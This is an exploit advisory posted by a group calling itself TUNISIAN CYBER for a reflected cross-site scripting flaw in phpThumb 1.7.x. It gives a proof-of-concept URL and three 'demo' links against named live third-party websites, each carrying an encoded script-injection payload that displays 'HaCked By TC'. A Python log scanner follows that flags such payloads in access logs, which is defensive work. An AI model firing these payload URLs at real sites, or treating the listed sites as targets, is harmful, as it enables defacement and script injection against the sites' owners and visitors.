
phpThumb 1.7.X Cross Site Scripting vulnerability

Author: TUNISIAN CYBER, Published: 06-12-2013
X-------------------------------------------------------------X
_____ _ _ _ _ _____ _____ _____ ___ _ _ _______ _______ ___________
|_ _| | | | \ | |_ _/ ___|_ _|/ _ \ | \ | | / __ \ \ / / ___ \ ___| ___ \
| | | | | | \| | | | \ `--. | | / /_\ \| \| | | / \/\ V /| |_/ / |__ | |_/ /
| | | | | | . ` | | | `--. \ | | | _ || . ` | | | \ / | ___ \ __|| /
| | | |_| | |\ |_| |_/\__/ /_| |_| | | || |\ | | \__/\ | | | |_/ / |___| |\ \
\_/ \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/ \____/ \_/ \____/\____/\_| \_|
X-------------------------------------------------------------X


[+] Author: TUNISIAN CYBER
[+] Exploit Title: phpThumb 1.7.X Cross Site Scripting vulnerability
[+] Date: 6-12-2013
[+] Category: WebApp
[+] Google Dork: n/a
[+] Tested on: Win7, Ubuntu 13.04


########################################################################################


p.0.c:

http://127.0.0.1/[Path]/wp-content/themes/moustachey/assets/js/plugins/jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day TUNISIAN CYBER/)//


Demos:
http://www.yes-group.ca/phpthumb/phpThumb.php?src=%22%3E%3Cscript%3Ealert%28%27HaCked%20By%20TC%27%29;%3C/script%3E
http://www.serimage.ro/phpthumb/phpThumb.php?src=%22%3E%3Cscript%3Ealert%28%27HaCked%20By%20TC%27%29;%3C/script%3E
http://www.esperanca.com.br/wp-content/themes/comfy/scripts/phpThumb/phpThumb.php?src=%22%3E%3Cscript%3Ealert%28%27HaCked%20By%20TC%27%29;%3C/script%3E
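As an added example (not part of the advisory, and not phpThumb project code), the following Python scanner flags access-log requests to phpThumb.php whose `src` parameter, after percent-decoding, carries the markup-injection shape shown in the demo URLs above. The log lines are constructed for the example; the IPs and paths are placeholders.

```python
"""Flag reflected-XSS probes against the src parameter of phpThumb.php in web access logs."""
import re
from urllib.parse import urlsplit, unquote

# Constructed sample access-log lines (combined log format); not taken from any real server.
SAMPLE_LOG = """\
203.0.113.7 - - [06/Dec/2013:10:01:02 +0000] "GET /phpthumb/phpThumb.php?src=images/logo.png&w=200 HTTP/1.1" 200 5123
203.0.113.9 - - [06/Dec/2013:10:01:09 +0000] "GET /phpthumb/phpThumb.php?src=%22%3E%3Cscript%3Ealert%28%27HaCked%20By%20TC%27%29;%3C/script%3E HTTP/1.1" 200 812
198.51.100.4 - - [06/Dec/2013:10:02:15 +0000] "GET /wp-content/themes/comfy/scripts/phpThumb/phpThumb.php?src=%2522%253E%253Cscript%253Ealert(1)%253C/script%253E HTTP/1.1" 200 790
198.51.100.5 - - [06/Dec/2013:10:03:00 +0000] "GET /index.php?q=%3Cscript%3E HTTP/1.1" 200 100
"""

# Request line of the combined log format: client IP, timestamp, method, target, status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Markup-injection shapes: a script tag, an event handler, a javascript: URL, or an attribute-closing quote.
SUSPICIOUS = re.compile(r'<\s*script|on\w+\s*=|javascript:|["\']\s*>', re.IGNORECASE)


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads (%2522 -> %22 -> ") are still caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def query_values(query, name):
    """Yield the still-encoded values of parameter `name`, splitting only on '&' (a ';' stays in the value)."""
    for pair in query.split('&'):
        key, _, val = pair.partition('=')
        if unquote(key) == name:
            yield val


def scan_log(text):
    """Return (client ip, path, decoded src) for every phpThumb.php request whose src looks like injection."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group('target'))
        if not parts.path.lower().endswith('/phpthumb.php'):
            continue  # only the script named in the advisory is of interest here
        for raw in query_values(parts.query, 'src'):
            decoded = decode_fully(raw)
            if SUSPICIOUS.search(decoded):
                hits.append((m.group('ip'), parts.path, decoded))
    return hits


if __name__ == '__main__':
    for ip, path, payload in scan_log(SAMPLE_LOG):
        print(f'{ip} {path} src={payload!r}')
```

The double-decoding loop matters because a single `unquote` would leave the third sample line looking like an innocent percent string.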


./3nD
########################################################################################
